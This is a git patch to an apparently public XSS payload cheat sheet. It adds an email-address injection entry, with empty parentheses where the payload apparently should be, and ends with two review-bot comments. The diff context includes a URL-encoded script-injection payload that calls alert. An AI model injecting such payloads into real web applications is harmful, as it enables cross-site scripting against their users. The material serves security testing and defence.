From fcf69f82266dd7c8a795e0ed0fb22383320c52be Mon Sep 17 00:00:00 2001 From: dave Date: Fri, 31 May 2024 13:27:32 +0200 Subject: [PATCH] Add additional XSS payload in email addresses RFC5322 --- XSS Injection/README.md | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 5fae506..3a22514 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -783,6 +783,12 @@ $ echo "" | xxd ">"@x.y ``` +([RFC5322 compliant](https://0dave.ch/posts/rfc5322-fun/)) + +```javascript +xss@example.com() +``` + ### Bypass document blacklist ```javascript @@ -1405,4 +1411,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld - [Self Closing Script](https://twitter.com/PortSwiggerRes/status/1257962800418349056) - [Bypass < with <](https://hackerone.com/reports/639684) - [Bypassing Signature-Based XSS Filters: Modifying Script Code](https://portswigger.net/support/bypassing-signature-based-xss-filters-modifying-script-code) -- [Secret Web Hacking Knowledge: CTF Authors Hate These Simple Tricks - Philippe Dourassov - 13 may 2024](https://youtu.be/Sm4G6cAHjWM) \ No newline at end of file +- [Secret Web Hacking Knowledge: CTF Authors Hate These Simple Tricks - Philippe Dourassov - 13 may 2024](https://youtu.be/Sm4G6cAHjWM)
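Review bot: the fence added after `">"@x.y` is tagged `javascript`, but its content, `xss@example.com()`, is an email address rather than script, and as it appears here the parentheses are empty, so the entry does not show what the "RFC5322 compliant" label refers to. Suggest replacing the bare `([RFC5322 compliant](https://0dave.ch/posts/rfc5322-fun/))` line with a short sentence naming the RFC 5322 feature involved (a parenthesised comment in the address), using an untagged fence for the address, and noting for readers on the defending side that an address which passes RFC 5322 validation still needs context-aware output encoding wherever it is rendered.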
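Review bot: in the references hunk (`@@ -1405,4 +1411,4 @@`) the only change is the trailing newline on the last entry, which is unrelated to the subject line; split it into its own commit or mention it in the commit message. The source for the new entry is linked only inline in the first hunk, so if this list is where the README collects its sources, add an entry for https://0dave.ch/posts/rfc5322-fun/ here as well, in the same `- [title](url)` form as the lines above.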